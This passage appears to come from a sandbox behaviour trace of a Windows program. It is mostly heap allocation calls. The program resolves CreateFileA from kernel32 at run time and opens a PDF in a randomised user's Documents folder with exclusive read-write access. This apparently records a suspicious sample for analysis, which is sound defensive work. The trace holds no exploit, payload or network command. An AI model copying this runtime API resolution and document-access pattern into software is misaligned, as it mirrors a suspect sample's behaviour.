(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0034.678] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.681] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889430 [0034.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889430, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.681] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0034.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889430, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.681] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0034.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0034.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", cchWideChar=121, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 121 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x79) returned 0x7d5b30 [0034.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", cchWideChar=121, lpMultiByteStr=0x7d5b30, cbMultiByte=121, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", lpUsedDefaultChar=0x0) returned 121 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.682] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\oy9qr-e1terui8x.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=121, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 121 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf2) returned 0x7c5448 [0034.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=121, lpWideCharStr=0x7c5448, cchWideChar=121 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf") returned 121 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c50e0 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.684] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0034.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.686] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, 